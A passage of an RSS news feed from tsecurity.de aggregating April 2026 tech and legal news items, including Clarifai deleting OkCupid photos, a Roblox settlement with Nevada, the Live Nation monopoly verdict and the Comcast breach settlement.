<p>In a <a data-i13n="elm:affiliate_link;sellerN:time;elmt:;cpos:17;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=7212db91-cd64-4c1b-ab0d-1d1c998f089e&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=e039f8df-ab77-4360-a11b-8d4533a8af3f&amp;featureId=text-link&amp;merchantName=time&amp;linkText=fragile&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3RpbWUuY29tL2FydGljbGUvMjAyNi8wMy8yNi93ZS1tdXN0LXByZXBhcmUtZm9yLWFuLWFpLWJ1YmJsZS1ub3cvIiwiY29udGVudFV1aWQiOiJlMDM5ZjhkZi1hYjc3LTQzNjAtYTExYi04ZDQ1MzNhOGFmM2YiLCJvcmlnaW5hbFVybCI6Imh0dHBzOi8vdGltZS5jb20vYXJ0aWNsZS8yMDI2LzAzLzI2L3dlLW11c3QtcHJlcGFyZS1mb3ItYW4tYWktYnViYmxlLW5vdy8ifQ&amp;signature=AQAAAbopnjxLHISxRyVGmmu-XTUEJvYdHkxaX7YqvQqbJvM2&amp;gcReferrer=https%3A%2F%2Ftime.com%2Farticle%2F2026%2F03%2F26%2Fwe-must-prepare-for-an-ai-bubble-now%2F" class="rapid-with-clickid" data-original-link="https://time.com/article/2026/03/26/we-must-prepare-for-an-ai-bubble-now/">fragile</a> economy floated by <a data-i13n="cpos:18;pos:1" href="https://www.bloomberg.com/graphics/2026-ai-circular-deals/">rampant self-dealing</a> and the shifting moods of a few very rich weirdos, even the mere mention of AI's relentless forward march to annihilate its own creators can make a shoe company's stock pop, <a data-i13n="cpos:19;pos:1" href="https://www.forbes.com/sites/jonmarkman/2026/04/20/how-39-million-shoe-company-allbirds-turned-in-to-an-ai-company/">however briefly</a>.</p>
<p>Maybe that's why Meta was delighted to confirm the broad details of the Reuters story, yet declined multiple requests to comment on if workers can opt out of this surveillance, or if they are being compensated in any way for their data. I, for one, would still love to know!</p>
<p><em>Do you work at Meta and want to talk confidentially? I'm @amarae.60 on Signal.</em></p>This article originally appeared on Engadget at https://www.engadget.com/general/hey-meta-workers-are-you-getting-paid-for-those-keystrokes-131934881.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[AI company deletes the 3 million OKCupid photos it used for facial recognition training]]></title>
<description><![CDATA[When online platforms violate their own privacy policies to sell your photos, have no fear: They just might have to pay an undisclosed settlement fee 12 years later. (Who says justice is dead?) According to Reuters, AI company Clarifai says it has deleted 3 million profile photos taken from datin...]]></description>
<link>https://tsecurity.de/de/3452839/it-nachrichten/ai-company-deletes-the-3-million-okcupid-photos-it-used-for-facial-recognition-training/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452839/it-nachrichten/ai-company-deletes-the-3-million-okcupid-photos-it-used-for-facial-recognition-training/</guid>
<pubDate>Tue, 21 Apr 2026 22:02:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When online platforms violate their own privacy policies to sell your photos, have no fear: They just might have to pay an undisclosed settlement fee 12 years later. (Who says justice is dead?) According to <em>Reuters</em>, AI company Clarifai says it has <a target="_blank" class="link" href="https://www.reuters.com/legal/government/ai-company-deleted-okcupid-user-photos-data-after-ftc-scrutiny-2026-04-20/" data-i13n="cpos:1;pos:1">deleted</a> 3 million profile photos taken from dating site OkCupid in 2014. It follows a settlement reached last month <a target="_blank" class="link" href="https://www.engadget.com/cybersecurity/okcupid-settles-ftc-case-on-alleged-misuse-of-its-users-personal-data-175159228.html" data-i13n="cpos:2;pos:1">between the FTC and Match Group</a>, OkCupid's owner.</p><p>The Delaware-based Clarifai reportedly certified the data deletion to the FTC on April 7. The company also confirmed to US Representative Lori Trahan (D-MA) that it deleted any models that trained on the data. Clarifai told the representative's office that it hadn't shared the data with third parties.</p><p>The FTC opened the investigation in 2019, after <em>The New York Times</em> <a target="_blank" class="link rapid-with-clickid" href="https://shopping.yahoo.com/rdlw?merchantId=c813ae39-7d58-41cb-ac66-ad830606ceef&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=a0e5fc1d-1c28-4d66-a85a-e63bc800c22a&amp;featureId=text-link&amp;merchantName=The+New+York+Times&amp;linkText=reported&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5ueXRpbWVzLmNvbS8yMDE5LzA3LzEzL3RlY2hub2xvZ3kvZGF0YWJhc2VzLWZhY2VzLWZhY2lhbC1yZWNvZ25pdGlvbi10ZWNobm9sb2d5Lmh0bWwiLCJjb250ZW50VXVpZCI6ImEwZTVmYzFkLTFjMjgtNGQ2Ni1hODVhLWU2M2JjODAwYzIyYSIsIm9yaWdpbmFsVXJsIjoiaHR0cHM6Ly93d3cubnl0aW1lcy5jb20vMjAxOS8wNy8xMy90ZWNobm9sb2d5L2RhdGFiYXNlcy1mYWNlcy1mYWNpYWwtcmVjb2duaXRpb24tdGVjaG5vbG9neS5odG1sIn0&amp;signature=AQAAAVFuu89psZjiPWGZJzhkJZyJDl0Z2ST3QOAW67Q8Ju1g&amp;gcReferrer=https%3A%2F%2Fwww.nytimes.com%2F2019%2F07%2F13%2Ftechnology%2Fdatabases-faces-facial-recognition-technology.html" data-i13n="elm:affiliate_link;sellerN:The New York Times;elmt:;cpos:3;pos:1" data-original-link="https://www.nytimes.com/2019/07/13/technology/databases-faces-facial-recognition-technology.html">reported</a> that Clarifai had built a training database using OkCupid dating profile photos. The behavior was a direct violation of OkCupid’s privacy policy. Court documents reviewed by <em>Reuters</em> reveal that Clarifai asked OkCupid executives for the data in 2014. Apparently, they obliged.</p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/imgi_198_image_10-mar-26-2024-09-54-42-5759-pm_2190.png" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/imgi_198_image_10-mar-26-2024-09-54-42-5759-pm_2190.png" alt="Five people sitting on stairs. Creepy boxes surround their faces, estimating age, race and gender." data-uuid="f9f77131-9fed-4af2-b5ac-8ecc6da1a802"><figcaption>&lt;p&gt;Clarifai uses this creepy facial profiling example to sell its services.&lt;/p&gt;</figcaption><div class="photo-credit">Clarifai</div></figure><p>"We're ⁠collecting data now and just realized that OkCupid must have a HUGE amount of awesome data for this," Clarifai founder Matthew Zeiler wrote in an email to OkCupid co-founder Maxwell Krohn. The AI startup used the dating site's images to build a facial recognition service that can identify a person's age, gender and race. (Another brilliant and totally ethical idea from Clarifai, tapping into unsecured city surveillance cameras without authorization, was reportedly shuttered.)</p><p>Zeiller suggested to <em>The New York Times</em> in 2019 that people needed to, well, get over it. "There has to be some level of trust with tech companies like Clarifai to put powerful technology to good use, and get comfortable with that," the AI founder declared. Some of OkCupid's founders were reportedly investors in Clarifai.</p><p>As part of the settlement, the FTC "permanently prohibited" OkCupid from misrepresenting its data collection and privacy controls. <em>TechCrunch</em> <a target="_blank" class="link" href="https://techcrunch.com/2026/04/21/clarifai-okcupid-facial-recognition-ai-ftc-settlement/" data-i13n="cpos:4;pos:1">notes</a> how strange it is to use that as a penalty, given that FTC rules already bar that behavior.</p>This article originally appeared on Engadget at https://www.engadget.com/ai/ai-company-deletes-the-3-million-okcupid-photos-it-used-for-facial-recognition-training-195223996.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Clarifai deletes 3 million photos that OkCupid provided to train facial recognition AI, report says]]></title>
<description><![CDATA[The photo deletion comes after an FTC settlement with Clarifai. The company had asked OkCupid — whose executives had invested in Clarifai — to share data in 2014, according to court documents.]]></description>
<link>https://tsecurity.de/de/3452396/it-nachrichten/clarifai-deletes-3-million-photos-that-okcupid-provided-to-train-facial-recognition-ai-report-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452396/it-nachrichten/clarifai-deletes-3-million-photos-that-okcupid-provided-to-train-facial-recognition-ai-report-says/</guid>
<pubDate>Tue, 21 Apr 2026 19:16:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The photo deletion comes after an FTC settlement with Clarifai. The company had asked OkCupid — whose executives had invested in Clarifai — to share data in 2014, according to court documents.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google now lets you have full conversations with Gemini for Home]]></title>
<description><![CDATA[Google announced today that it is upgrading the Gemini for Home service with a "continued conversations" feature. Continued conversation allows a user to have a natural discussion with the Gemini platform without prefacing every follow-up request with the "Hey Google" prompt. The microphone will ...]]></description>
<link>https://tsecurity.de/de/3452163/it-nachrichten/google-now-lets-you-have-full-conversations-with-gemini-for-home/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452163/it-nachrichten/google-now-lets-you-have-full-conversations-with-gemini-for-home/</guid>
<pubDate>Tue, 21 Apr 2026 18:02:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google announced today that it is upgrading the Gemini for Home service with a "continued conversations" feature. Continued conversation allows a user to have a natural discussion with the Gemini platform without prefacing every follow-up request with the "Hey Google" prompt. The microphone will remain active on a smart device for a few seconds after the Gemini AI assistant provides its reply. During that window, the lights on the hardware will pulse or glow, indicating that you can keep chatting normally with the chatbot without needing a wake word. Gemini should retain the context as the conversation progresses, which should allow it to provide the desired information faster without the need for a user to repeat key details.</p><p>The feature is rolling out today for all Gemini for Home voice assistant languages and in all supported regions. Continued conversations have to be manually enabled in the Google Home app through the settings menu under "Gemini for Home voice assistant." Google said that Gemini should be able to distinguish between follow-up questions addressed to the chatbot and other conversations happening in a room, but it should be interesting to track how successful that is given the <a target="_blank" class="link" href="https://www.engadget.com/big-tech/google-agrees-to-68-million-settlement-in-voice-assistant-privacy-lawsuit-222405727.html" data-i13n="cpos:1;pos:1">past history</a> of voice assistants unintentionally eavesdropping. </p><p>Continued conversation was an <a target="_blank" class="link" href="https://www.engadget.com/2018-06-21-google-assistant-continued-conversation-available.html" data-i13n="cpos:2;pos:1">option</a> under the Google Assistant platform, but it had more limited availability. Google has been preparing Gemini for Home as a <a target="_blank" class="link" href="https://www.engadget.com/home/smart-home/gemini-for-home-is-the-official-replacement-for-google-assistant-on-smart-devices-130041482.html" data-i13n="cpos:3;pos:1">replacement</a> for Google Assistant platform since the fall.</p>This article originally appeared on Engadget at https://www.engadget.com/home/smart-home/google-now-lets-you-have-full-conversations-with-gemini-for-home-160000511.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Roblox agrees to a $12 million settlement with Nevada]]></title>
<description><![CDATA[Amidst ongoing legal trouble with several states and more than 100 pending lawsuits, this week Roblox announced a $12 million settlement with Nevada, allowing the company to avoid going to trial in this case.Following the agreement, Nevada Attorney General Aaron Ford said "this settlement will cr...]]></description>
<link>https://tsecurity.de/de/3442413/it-nachrichten/roblox-agrees-to-a-12-million-settlement-with-nevada/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442413/it-nachrichten/roblox-agrees-to-a-12-million-settlement-with-nevada/</guid>
<pubDate>Fri, 17 Apr 2026 16:47:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Amidst ongoing legal trouble with several states and more than 100 pending lawsuits, this week <a target="_blank" class="link" href="https://apnews.com/article/roblox-nevada-settlement-28b3d7d7a483dc28462a7504b67c9bbc" data-i13n="cpos:1;pos:1">Roblox announced a $12 million settlement with Nevada</a>, allowing the company to avoid going to trial in this case.</p><p>Following the agreement, Nevada Attorney General Aaron Ford said "this settlement will create a safer environment for our children online, and I hope that it will serve as a bellwether for how online interactive platforms allow our state's youth to use their products." As part of the deal, Roblox has agreed to give $10 million over three years to local children's support programs like the <a target="_blank" class="link" href="https://www.bgca.org/" data-i13n="cpos:2;pos:1">Boys and Girls Club</a> and other nondigital groups while spending another $2.5 million to fund a law enforcement liaison position and awareness campaigns regarding online safety.</p><p>Additionally, Roblox will also implement more rigorous safety protocols including an age verification system that combines a facial age estimation system with government-issued IDs that will only allow children to talk with other players of a similar age. Furthermore, users under 16 will not be allowed to message adults unless they have been designated as a "trusted friend," which can be assigned via QR code. This is intended to ensure that any adults who talk to minors on the platform have an existing relationship with the child.</p><p>Parental controls will be available for accounts of users up to 16 years old (previously the limit was 13). The company says it will also create children's accounts for anyone under 16 that will restrict access to adult content and provide a list of games that have been vetted to be appropriate for younger players. These changes come after a recent update that established new guidelines for Roblox Kids accounts (for children between five and eight years old) and Roblox Select accounts (for children between nine and 15), which come with varying content and chat restrictions. </p><p>However, while Roblox has settled with Nevada, the company is still facing a number of lawsuits from other parties and states including Kentucky, Iowa, Louisiana, Texas and more, regarding claims that the platform has knowingly facilitated child sexual exploitation.</p><p></p>This article originally appeared on Engadget at https://www.engadget.com/gaming/roblox-agrees-to-a-12-million-settlement-with-nevada-142842421.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe Has 'Maybe 6 Weeks of Jet Fuel Left']]></title>
<description><![CDATA[The head of the International Energy Agency warned that Europe may have only "six weeks or so" of jet fuel left if oil supplies remain blocked by the Iran war and the Strait of Hormuz stays disrupted. The Associated Press reports: IEA Executive Director Fatih Birol painted a sobering picture of t...]]></description>
<link>https://tsecurity.de/de/3440059/it-security-nachrichten/europe-has-maybe-6-weeks-of-jet-fuel-left/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3440059/it-security-nachrichten/europe-has-maybe-6-weeks-of-jet-fuel-left/</guid>
<pubDate>Thu, 16 Apr 2026 22:07:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The head of the International Energy Agency warned that Europe may have only "six weeks or so" of jet fuel left if oil supplies remain blocked by the Iran war and the Strait of Hormuz stays disrupted. The Associated Press reports: IEA Executive Director Fatih Birol painted a sobering picture of the global repercussions of what he called "the largest energy crisis we have ever faced," stemming from the pinch-off of oil, gas and other vital supplies through the Strait of Hormuz. "In the past there was a group called 'Dire Straits.' It's a dire strait now, and it is going to have major implications for the global economy. And the longer it goes, the worse it will be for the economic growth and inflation around the world," he told The Associated Press. The impact will be "higher petrol (gasoline) prices, higher gas prices, high electricity prices," said Birol, speaking in his Paris office looking out over the Eiffel Tower.
 
Economic pain will be felt unevenly and "the countries who will suffer the most will not be those whose voice are heard a lot. It will be mainly the developing countries. Poorer countries in Asia, in Africa and in Latin America," said the Turkish economist and energy expert who has led the IEA since 2015. But without a settlement of the Iran war that permanently reopens the Strait of Hormuz, "Everybody is going to suffer," he added. "Some countries may be richer than the others. Some countries may have more energy than the others, but no country, no country is immune to this crisis," he said.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Europe+Has+'Maybe+6+Weeks+of+Jet+Fuel+Left'%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F04%2F16%2F1916239%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F04%2F16%2F1916239%2Feurope-has-maybe-6-weeks-of-jet-fuel-left%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/04/16/1916239/europe-has-maybe-6-weeks-of-jet-fuel-left?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Roblox to implement youth protections and pay $12m in Nevada settlement]]></title>
<description><![CDATA[Popular gaming platform will require age verification, restrict nighttime notifications for minors and limit chatsSign up for the Breaking News US email to get newsletter alerts in your inboxRoblox, a gaming platform popular with kids, will implement increased protections for young users and pay ...]]></description>
<link>https://tsecurity.de/de/3437370/it-nachrichten/roblox-to-implement-youth-protections-and-pay-12m-in-nevada-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3437370/it-nachrichten/roblox-to-implement-youth-protections-and-pay-12m-in-nevada-settlement/</guid>
<pubDate>Thu, 16 Apr 2026 06:32:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Popular gaming platform will require age verification, restrict nighttime notifications for minors and limit chats</p><ul><li><p><a href="https://www.theguardian.com/news/2026/feb/17/sign-up-for-the-breaking-news-us-email-to-get-newsletter-alerts-direct-to-your-inbox?utm_medium=ACQUISITIONS_STANDFIRST&amp;utm_campaign=BN22326&amp;utm_content=signup&amp;utm_term=standfirst&amp;utm_source=GUARDIAN_WEB">Sign up for the Breaking News US email to get newsletter alerts in your inbox</a></p></li></ul><p><a href="https://www.theguardian.com/games/roblox">Roblox</a>, a gaming platform popular with kids, will implement increased protections for young users and pay more than $12m to the state of Nevada in what the state attorney general, Aaron Ford, on Wednesday called a first-of-its-kind agreement.</p><p>“This settlement will create a safer environment for our children online, and I hope that it will serve as a bellwether for how online interactive platforms allow our state’s youth to use their products,” the Democrat said Wednesday.</p> <a href="https://www.theguardian.com/games/2026/apr/15/roblox-settlement-nevada-youth-protections">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wait, could they still actually break up Live Nation?]]></title>
<description><![CDATA[A federal jury found that Live Nation has acted illegally as a monopoly -- but the company just came to a tentative settlement with the DOJ last month.]]></description>
<link>https://tsecurity.de/de/3436922/it-nachrichten/wait-could-they-still-actually-break-up-live-nation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436922/it-nachrichten/wait-could-they-still-actually-break-up-live-nation/</guid>
<pubDate>Wed, 15 Apr 2026 23:46:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A federal jury found that Live Nation has acted illegally as a monopoly -- but the company just came to a tentative settlement with the DOJ last month.]]></content:encoded>
</item>
<item>
<title><![CDATA[Federal jury finds concert business Live Nation is a monopoly]]></title>
<description><![CDATA[Live Nation, which operates the Ticketmaster platform, has been determined to be a monopoly. A federal jury handed down its decision today that the company violated federal and state antitrust rules. This finding won't surprise anyone who has used Ticketmaster and been sticker-shocked by their fi...]]></description>
<link>https://tsecurity.de/de/3436806/it-nachrichten/federal-jury-finds-concert-business-live-nation-is-a-monopoly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436806/it-nachrichten/federal-jury-finds-concert-business-live-nation-is-a-monopoly/</guid>
<pubDate>Wed, 15 Apr 2026 22:46:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Live Nation, which operates the Ticketmaster platform, has been determined to be a <a target="_blank" class="link rapid-with-clickid" href="https://shopping.yahoo.com/rdlw?merchantId=c813ae39-7d58-41cb-ac66-ad830606ceef&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=33909111-8207-4b5a-b3ac-6a299e2e7ad7&amp;featureId=text-link&amp;merchantName=The+New+York+Times&amp;linkText=monopoly&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5ueXRpbWVzLmNvbS8yMDI2LzA0LzE1L2FydHMvbXVzaWMvbGl2ZS1uYXRpb24tYW50aXRydXN0LXRyaWFsLXZlcmRpY3QtbW9ub3BvbHkuaHRtbCIsImNvbnRlbnRVdWlkIjoiMzM5MDkxMTEtODIwNy00YjVhLWIzYWMtNmEyOTllMmU3YWQ3Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5ueXRpbWVzLmNvbS8yMDI2LzA0LzE1L2FydHMvbXVzaWMvbGl2ZS1uYXRpb24tYW50aXRydXN0LXRyaWFsLXZlcmRpY3QtbW9ub3BvbHkuaHRtbCJ9&amp;signature=AQAAAfe73pWMTVK5Gz8s0SHvi-ruhQnA_1GZRpWcYKCYh2WL&amp;gcReferrer=https%3A%2F%2Fwww.nytimes.com%2F2026%2F04%2F15%2Farts%2Fmusic%2Flive-nation-antitrust-trial-verdict-monopoly.html" data-i13n="elm:affiliate_link;sellerN:The New York Times;elmt:;cpos:1;pos:1" data-original-link="https://www.nytimes.com/2026/04/15/arts/music/live-nation-antitrust-trial-verdict-monopoly.html">monopoly</a>. A federal jury handed down its decision today that the company violated federal and state antitrust rules. This finding won't surprise anyone who has used Ticketmaster and been sticker-shocked by their final bill. However, it's unclear what the jury’s decision will mean in practice. </p><p>For starters, the judge overseeing the case hasn't determined what remedies will be applied. The actions could go as far as requiring Live Nation to sell off Ticketmaster. There are also monetary damages to be awarded, which haven't been set yet. And whatever the judge decides, it's also likely that Live Nation will appeal the decision. We've reached out to Ticketmaster for comment. </p><p>The Department of Justice and a group of state and district attorneys general <a target="_blank" class="link" href="https://www.engadget.com/ticketmaster-owner-sued-by-doj-and-30-attorneys-general-over-alleged-monopoly-160153725.html" data-i13n="cpos:2;pos:1">sued</a> Live Nation on monopoly claims in 2024. The government agency reached a <a target="_blank" class="link" href="https://www.engadget.com/entertainment/music/live-nation-settlement-avoids-breakup-with-ticketmaster-155031214.html" data-i13n="cpos:3;pos:1">settlement</a> with Live Nation last month, but the other parties continued their action. There's also a separate case being waged by the Federal Trade Commission questioning whether Live Nation <a target="_blank" class="link" href="https://www.engadget.com/entertainment/the-ftc-sues-ticketmaster-for-allegedly-colluding-with-resellers-191337586.html" data-i13n="cpos:4;pos:1">colluded with ticket resellers</a>.</p>This article originally appeared on Engadget at https://www.engadget.com/entertainment/music/federal-jury-finds-concert-business-live-nation-is-a-monopoly-203924011.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Live Nation Illegally Monopolized Ticketing Market, Jury Finds]]></title>
<description><![CDATA[A Manhattan federal jury found that Live Nation and Ticketmaster illegally maintained monopoly power in the ticketing market. The findings follow an antitrust case brought by states after a separate DOJ settlement. CNN reports: The verdict was reached following a lengthy trial in New York federal...]]></description>
<link>https://tsecurity.de/de/3436754/it-security-nachrichten/live-nation-illegally-monopolized-ticketing-market-jury-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436754/it-security-nachrichten/live-nation-illegally-monopolized-ticketing-market-jury-finds/</guid>
<pubDate>Wed, 15 Apr 2026 22:07:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Manhattan federal jury found that Live Nation and Ticketmaster illegally maintained monopoly power in the ticketing market. The findings follow an antitrust case brought by states after a separate DOJ settlement. CNN reports: The verdict was reached following a lengthy trial in New York federal court that included testimony from top executives in the music and entertainment industries. Jurors began deliberating on Friday. The Justice Department and 39 state attorneys general, including California and New York, and Washington, DC, sued Live Nation in 2024 alleging its combination with Ticketmaster and control of "virtually every aspect of the live music ecosystem" have harmed fans, artists, and venues.
 
During the second week of trial, in a move that surprised even the judge, the Justice Department reached a secret settlement with Live Nation. A handful of states signed onto the deal, but more than two dozen proceeded to trial. Under the DOJ deal, Live Nation agreed to allow competitors, like SeatGeek or StubHub, to offer tickets to its events, cap ticketing service fees at 15%, and divest exclusive booking agreements with 13 amphitheaters. The deal includes a $280 million settlement fund for state damages claims for the handful of states that signed onto the deal. The DOJ settlement requires the judge's approval.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Live+Nation+Illegally+Monopolized+Ticketing+Market%2C+Jury+Finds%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F15%2F1937205%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F15%2F1937205%2Flive-nation-illegally-monopolized-ticketing-market-jury-finds%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/04/15/1937205/live-nation-illegally-monopolized-ticketing-market-jury-finds?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Xfinity Data Breach Settlement: How To Claim Your Money Now]]></title>
<description><![CDATA[Back in 2023, hackers broke into Xfinity and accessed the personal information of about 36 million customers. The company faced a class action lawsuit over the security failure and recently agreed to a massive 117.5 million dollar settlement. If you had an active account during that time, your da...]]></description>
<link>https://tsecurity.de/de/3436687/ios-mac-os/xfinity-data-breach-settlement-how-to-claim-your-money-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436687/ios-mac-os/xfinity-data-breach-settlement-how-to-claim-your-money-now/</guid>
<pubDate>Wed, 15 Apr 2026 21:21:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Back in 2023, hackers broke into Xfinity and accessed the personal information of about 36 million customers. The company faced a class action lawsuit over the security failure and recently agreed to a massive 117.5 million dollar settlement. If you had an active account during that time, your data was likely affected by the breach, meaning you can now claim a cash payout.



Find out what happened during the massive security failure



The issue started in late 2023 when Citrix, a software provider for Xfinity, discovered a flaw in its products. Hackers used this weakness to enter the internal systems of Xfinity between October 16 and October 19. The company contacted federal law enforcement and launched an investigation.



The intruders managed to steal usernames and hashed passwords. For many people, the exposed details also included names, contact information, dates of birth, secret security questions, and the last four digits of social security numbers.



Xfinity successfully patched its systems shortly after the incident, but the hackers had already taken the data.



Follow these simple steps to claim your settlement money



Comcast emailed every affected user to explain the situation. You need a unique settlement member ID number to get your money, which is located inside that original notification message. If you lost the email, you can use the lookup form on the official settlement website to retrieve your ID.



Once you have the number, submit your claim online. You can choose a flat cash payout, estimated at around $50. If you lost money or spent time dealing with identity theft because of the breach, you can submit documented proof to request a larger amount.



The final payout depends on how many people file a claim, so the estimate could change. Make sure to complete your application before the deadline so you do not miss out on the compensation.]]></content:encoded>
</item>
<item>
<title><![CDATA[Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify]]></title>
<description><![CDATA[Comcast customers affected by the 2023 breach may qualify for cash, reimbursement, and identity protection under a proposed $117.5 million settlement. The post Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify appeared first on TechRepublic. This article has…
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3436678/it-security-nachrichten/comcasts-1175m-breach-settlement-up-to-30m-people-may-qualify/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436678/it-security-nachrichten/comcasts-1175m-breach-settlement-up-to-30m-people-may-qualify/</guid>
<pubDate>Wed, 15 Apr 2026 21:20:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Comcast customers affected by the 2023 breach may qualify for cash, reimbursement, and identity protection under a proposed $117.5 million settlement. The post Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify appeared first on TechRepublic. This article has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/comcasts-117-5m-breach-settlement-up-to-30m-people-may-qualify/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/comcasts-117-5m-breach-settlement-up-to-30m-people-may-qualify/">Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify]]></title>
<description><![CDATA[Comcast customers affected by the 2023 breach may qualify for cash, reimbursement, and identity protection under a proposed $117.5 million settlement.
The post Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3436655/it-security-nachrichten/comcasts-1175m-breach-settlement-up-to-30m-people-may-qualify/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436655/it-security-nachrichten/comcasts-1175m-breach-settlement-up-to-30m-people-may-qualify/</guid>
<pubDate>Wed, 15 Apr 2026 21:07:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Comcast customers affected by the 2023 breach may qualify for cash, reimbursement, and identity protection under a proposed $117.5 million settlement.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-comcast-117-5m-settlement-30m-data-breach/">Comcast’s $117.5M Breach Settlement: Up to 30M People May Qualify</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FTC pushes ad agencies into dropping brand safety rules]]></title>
<description><![CDATA[The Federal Trade Commission (FTC) and a group of eight states have announced a proposed settlement with big ad agencies that will prevent them from working together to avoid certain platforms like X based on their political viewpoints. In a complaint, the FTC argues that ad agencies violated ant...]]></description>
<link>https://tsecurity.de/de/3436635/it-nachrichten/ftc-pushes-ad-agencies-into-dropping-brand-safety-rules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436635/it-nachrichten/ftc-pushes-ad-agencies-into-dropping-brand-safety-rules/</guid>
<pubDate>Wed, 15 Apr 2026 21:02:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
